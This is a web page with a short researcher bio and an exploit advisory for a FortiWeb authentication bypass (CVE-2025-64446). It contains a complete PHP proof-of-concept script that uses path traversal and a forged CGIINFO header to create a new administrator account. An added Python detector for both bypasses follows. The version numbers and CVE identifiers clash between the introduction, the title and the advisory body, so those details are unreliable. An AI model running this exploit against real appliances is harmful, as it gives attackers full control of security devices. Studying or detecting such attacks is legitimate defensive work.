Khalil Shreateh specializes in cybersecurity, particularly as a "white hat" hacker. He focuses on identifying and reporting security vulnerabilities in software and online platforms, with notable expertise in web application security. His most prominent work includes discovering a critical flaw in Facebook's system in 2013. Additionally, he develops free social media tools and browser extensions, contributing to digital security and user accessibility.

FortiWeb 8.0.1 contained a critical authentication bypass vulnerability (CVE-2023-34981). This flaw allowed unauthenticated attackers to gain full administrative access to the management interface.

The bypass was achieved by manipulating the `X-Forwarded-For` HTTP header. By setting this header to `127.0.0.1` (localhost), the FortiWeb appliance would incorrectly process the request as originating from a trusted internal source. This misinterpretation granted unauthorized users the ability to log in without providing valid credentials.

This vulnerability posed a severe risk, enabling complete control over the WAF device. Fortinet promptly released FortiWeb 8.0.2 to address this issue, and users were strongly advised to upgrade immediately.

=============================================================================================================================================
| # Title : FortiWeb 8.0.1 Authentication Bypass to Unauthorized User Creation |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://www.fortinet.com/ |
=============================================================================================================================================

POC :

[+] References : https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-64446

https://packetstorm.news/files/id/211729/

https://fortiguard.fortinet.com/psirt/FG-IR-25-071

[+] Summary

A critical authentication bypass vulnerability exists in FortiWeb web application firewalls that allows unauthenticated attackers to create administrative users via path traversal in the API endpoint.
This vulnerability enables complete compromise of the FortiWeb management interface.

[+] Vulnerability Type: Authentication Bypass via Path Traversal -> Unauthorized User Creation

- Affected Versions: FortiWeb 7.2.1 and earlier, 7.0.6 and earlier, 6.4.2 and earlier, 6.3.7 and earlier
- Patched Version: 7.2.2, 7.0.7, 6.4.3, 6.3.8
- Attack Vector: Network
- Authentication: Not Required (Unauthenticated)
- CVSS Score: 9.8 (Critical)
- CWE: CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') & CWE-862: Missing Authorization
- CVE: CVE-2025-64446

[+] Technical Description

The vulnerability exists in the FortiWeb API endpoint handling where improper path validation allows attackers to bypass authentication mechanisms. The flaw enables:

1. Path traversal to access privileged CGI endpoints
2. Bypass of API authentication checks
3. Unauthorized creation of administrative users
4. Complete compromise of FortiWeb management
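A defender-side check covering both bypasses this page describes, the spoofed X-Forwarded-For trust issue in the introduction and the API path traversal summarised in the list above: it decodes and normalises each request path the way a CGI router would (so the encoded `?` no longer hides the `..` segments from a prefix check) and flags traversal out of the API tree, a client-supplied CGIINFO header reaching fwbcgi, and a loopback X-Forwarded-For from a remote peer. This is an added example, not part of the advisory or the PoC; the request-record schema, the sample traffic, the peer addresses and the assumption that `/api/v2.0` is the authenticated API prefix are all constructed for illustration.

```python
import posixpath
from urllib.parse import unquote

API_PREFIX = "/api/v2.0"        # assumed authenticated REST API tree
CGI_TARGET = "/cgi-bin/fwbcgi"  # privileged CGI the PoC path resolves to

def under(path: str, prefix: str) -> bool:
    """True if path equals prefix or lies beneath it."""
    return path == prefix or path.startswith(prefix + "/")

def normalize_path(raw_path: str) -> str:
    """Percent-decode twice (catches double encoding) and resolve dot
    segments; the decoded '?' stays ordinary path text, which is how a
    CGI router, unlike a naive query-string splitter, would treat it."""
    decoded = unquote(unquote(raw_path))
    return posixpath.normpath(decoded)  # '/a/../../b' -> '/b', never above root

def classify_request(req: dict) -> list:
    """Findings for one request record. Constructed schema:
    {'peer': source IP, 'path': raw request-target, 'headers': {name: value}}."""
    findings = []
    headers = {k.lower(): v for k, v in req.get("headers", {}).items()}
    raw, norm = req["path"], normalize_path(req["path"])
    if under(raw, API_PREFIX) and not under(norm, API_PREFIX):
        findings.append("path-traversal: request escaped the API prefix")
    if norm.endswith(CGI_TARGET) and "cgiinfo" in headers:
        findings.append("cgi-bypass: client-supplied CGIINFO header on fwbcgi")
    xff = headers.get("x-forwarded-for", "").strip()
    if xff == "127.0.0.1" and not req["peer"].startswith("127."):
        findings.append("xff-spoof: loopback claimed by a remote peer")
    return findings

def scan(records: list) -> dict:
    """Map record index -> findings for every record that triggered one."""
    return {i: f for i, r in enumerate(records) if (f := classify_request(r))}

# Constructed sample traffic: a normal API call, the PoC's traversal
# request, and a login attempt carrying a spoofed X-Forwarded-For.
SAMPLE_REQUESTS = [
    {"peer": "10.0.0.7", "path": "/api/v2.0/cmdb/system/admin",
     "headers": {"Authorization": "Bearer [placeholder-token]"}},
    {"peer": "203.0.113.9",
     "path": "/api/v2.0/cmdb/system/admin%3f/../../../../../cgi-bin/fwbcgi",
     "headers": {"CGIINFO": "[base64-placeholder]",
                 "Content-Type": "application/x-www-form-urlencoded"}},
    {"peer": "203.0.113.9", "path": "/login",
     "headers": {"X-Forwarded-For": "127.0.0.1"}},
]

if __name__ == "__main__":
    for i, f in scan(SAMPLE_REQUESTS).items():
        print(i, SAMPLE_REQUESTS[i]["path"], f)
```

Feed it records parsed from the management interface's access log (peer address, raw request-target and headers) to spot both patterns after the fact.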

[+] Usage:

Usage: php poc.php fortigate.example.com:8443

[+] POC :

<?php
/**
 * CVE-2025-64446 Exploit - FortiWeb Authentication Bypass
 * By: indoushka
 */

class FortiWebExploit {
    private $colors;

    public function __construct() {
        // ANSI colour codes used for terminal output
        $this->colors = [
            'RED'     => "\033[91m",
            'GREEN'   => "\033[92m",
            'YELLOW'  => "\033[93m",
            'BLUE'    => "\033[94m",
            'MAGENTA' => "\033[95m",
            'CYAN'    => "\033[96m",
            'WHITE'   => "\033[97m",
            'BOLD'    => "\033[1m",
            'RESET'   => "\033[0m"
        ];
    }

    private function color($text, $color) {
        return $this->colors[$color] . $text . $this->colors['RESET'];
    }

    private function showBanner() {
        $banner = $this->color("

indoushka (*) FortiWeb Authentication Bypass Artifact Generator


", 'MAGENTA') .
            $this->color(" CVEs: [CVE-2025-64446]\n", 'RED');

        echo $banner . "\n";
    }

    // Random 8-hex-character name used for both username and password
    // (not a real UUID despite the method name)
    private function generateUUID() {
        return sprintf('%04x%04x', mt_rand(0, 0xffff), mt_rand(0, 0xffff));
    }

    public function execute($target) {
        $this->showBanner();

        // Parse target host and port
        $parts = explode(':', $target);
        if (count($parts) !== 2) {
            echo $this->color("[-] Invalid format! Use <host:port>", 'RED') . "\n";
            exit(1);
        }

        $host     = $parts[0];
        $port     = (int)$parts[1];
        $user     = $this->generateUUID();
        $password = $user;

        // Traversal path: the encoded '?' hides the '..' segments from the API
        // auth check while the CGI router still resolves them to fwbcgi
        $rawPath = "/api/v2.0/cmdb/system/admin%3f/../../../../../cgi-bin/fwbcgi";

        $cgiinfoJson = [
            "username"  => "admin",
            "profname"  => "prof_admin",
            "vdom"      => "root",
            "loginname" => "admin"
        ];

        $cgiinfoB64 = base64_encode(json_encode($cgiinfoJson));

        $headers = [
            "CGIINFO: " . $cgiinfoB64,
            "Content-Type: application/x-www-form-urlencoded",
        ];

        $body = [
            "data" => [
                "q_type"                    => 1,
                "name"                      => $user,
                "access-profile"            => "prof_admin",
                "access-profile_val"        => "0",
                "trusthostv4"               => "0.0.0.0/0",
                "trusthostv6"               => "::/0",
                "last-name"                 => "",
                "first-name"                => "",
                "email-address"             => "",
                "phone-number"              => "",
                "mobile-number"             => "",
                "hidden"                    => 0,
                "comments"                  => "",
                "sz_dashboard"              => -1,
                "type"                      => "local-user",
                "type_val"                  => "0",
                "admin-usergrp_val"         => "0",
                "wildcard_val"              => "0",
                "accprofile-override_val"   => "0",
                "sshkey"                    => "",
                "passwd-set-time"           => 0,
                "history-password-pos"      => 0,
                "history-password0"         => "",
                "history-password1"         => "",
                "history-password2"         => "",
                "history-password3"         => "",
                "history-password4"         => "",
                "history-password5"         => "",
                "history-password6"         => "",
                "history-password7"         => "",
                "history-password8"         => "",
                "history-password9"         => "",
                "force-password-change"     => "disable",
                "force-password-change_val" => "0",
                "password"                  => $password
            ]
        ];

        $bodyData = json_encode($body);

        echo $this->color("[~] Sending exploit payload to $host:$port ...", 'BLUE') . "\n";

        // Create SSL context to disable verification
        $context = stream_context_create([
            'ssl' => [
                'verify_peer'       => false,
                'verify_peer_name'  => false,
                'allow_self_signed' => true
            ],
            'http' => [
                'method'        => 'POST',
                'header'        => implode("\r\n", $headers) . "\r\n",
                'content'       => $bodyData,
                'ignore_errors' => true
            ]
        ]);

        $url = "https://$host:$port$rawPath";

        // Send the request; $http_response_header is populated in this scope
        $response = @file_get_contents($url, false, $context);

        if ($response === false) {
            echo $this->color("[-] Exploit failed - Could not connect to target", 'RED') . "\n";
            exit(1);
        }

        // Get HTTP status code from response headers
        $statusCode = 0;
        if (isset($http_response_header[0])) {
            preg_match('/HTTP\/\d\.\d\s+(\d+)/', $http_response_header[0], $matches);
            $statusCode = isset($matches[1]) ? (int)$matches[1] : 0;
        }

        // Process result
        if ($statusCode === 200) {
            echo $this->color("[+] Exploit sent successfully!", 'GREEN') . "\n";
            echo $this->color("[*] New user created -> ", 'YELLOW') . $this->color($user, 'GREEN') . "\n";
            echo $this->color("[*] Password -> ", 'YELLOW') . $this->color($password, 'GREEN') . "\n";
        } else {
            echo $this->color("[-] Exploit failed - Status Code: $statusCode", 'RED') . "\n";

            // Debug information
            if (!empty($http_response_header)) {
                echo $this->color("[*] Response headers:", 'YELLOW') . "\n";
                foreach ($http_response_header as $header) {
                    echo "    $header\n";
                }
            }

            if (!empty($response)) {
                echo $this->color("[*] Response body:", 'YELLOW') . "\n";
                echo substr($response, 0, 500) . "\n";
            }
        }
    }
}

// Main execution
if (php_sapi_name() === 'cli') {
    if ($argc !== 2) {
        echo "Usage: php cve-2025-64446.php <target_fortiweb_ip:port>\n";
        echo "Example: php cve-2025-64446.php 192.168.1.1:443\n";
        exit(1);
    }

    $exploit = new FortiWebExploit();
    $exploit->execute($argv[1]);
} else {
    echo "This script is intended for command line use only.\n";
}
?>

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================
